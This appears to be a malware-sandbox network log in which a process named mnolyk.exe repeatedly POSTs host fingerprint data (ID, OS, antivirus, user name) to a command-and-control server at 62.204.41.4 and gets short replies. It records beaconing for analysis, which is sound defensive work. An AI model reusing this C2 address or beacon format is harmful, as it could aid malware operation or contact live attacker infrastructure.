                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      432 | 192.168.2.7 | 50160 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:55.923634052 CET | 892 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:55.987483978 CET | 892 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      433 | 192.168.2.7 | 50161 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:56.171482086 CET | 893 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:56.235949993 CET | 893 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      434 | 192.168.2.7 | 50162 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:56.405411005 CET | 894 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:56.468453884 CET | 894 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      435 | 192.168.2.7 | 50163 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:56.641062975 CET | 895 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:56.706188917 CET | 895 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      436 | 192.168.2.7 | 50164 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:56.874762058 CET | 896 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:56.938606977 CET | 896 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      437 | 192.168.2.7 | 50165 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:57.109837055 CET | 897 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:57.174860001 CET | 897 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      438 | 192.168.2.7 | 50166 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:57.344196081 CET | 898 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:57.407002926 CET | 898 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      439 | 192.168.2.7 | 50167 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:57.576210976 CET | 899 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:57.640512943 CET | 899 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      44 | 192.168.2.7 | 49768 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:08.295558929 CET | 476 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:08.361413956 CET | 476 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      440 | 192.168.2.7 | 50168 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:57.812117100 CET | 900 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:57.878155947 CET | 900 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      441 | 192.168.2.7 | 50169 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:58.055435896 CET | 901 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:58.122500896 CET | 901 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
442         192.168.2.7  50170        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:37:58.303704977 CET  902                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:37:58.366751909 CET  902                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
443         192.168.2.7  50171        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:37:58.553510904 CET  903                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:37:58.617981911 CET  903                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
444         192.168.2.7  50172        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:37:58.795469999 CET  904                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:37:58.858475924 CET  904                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
445         192.168.2.7  50173        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:37:59.034323931 CET  905                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:37:59.099589109 CET  905                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
446         192.168.2.7  50174        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:37:59.284898043 CET  906                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:37:59.348211050 CET  906                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
447         192.168.2.7  50175        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:37:59.517986059 CET  907                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:37:59.580991983 CET  907                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
448         192.168.2.7  50176        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:37:59.752747059 CET  908                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:37:59.817588091 CET  908                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
449         192.168.2.7  50177        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:37:59.985865116 CET  909                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:38:00.050785065 CET  909                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
45          192.168.2.7  49769        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:36:08.538973093 CET  476                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:36:08.622246027 CET  477                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
450         192.168.2.7  50178        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:38:00.218801022 CET  910                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:38:00.281066895 CET  910                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
451         192.168.2.7  50179        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp                           kBytes transferred  Direction  Data
Feb 6, 2023 18:38:00.453202963 CET  911                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
Feb 6, 2023 18:38:00.517158985 CET  911                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
452         192.168.2.7  50180        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
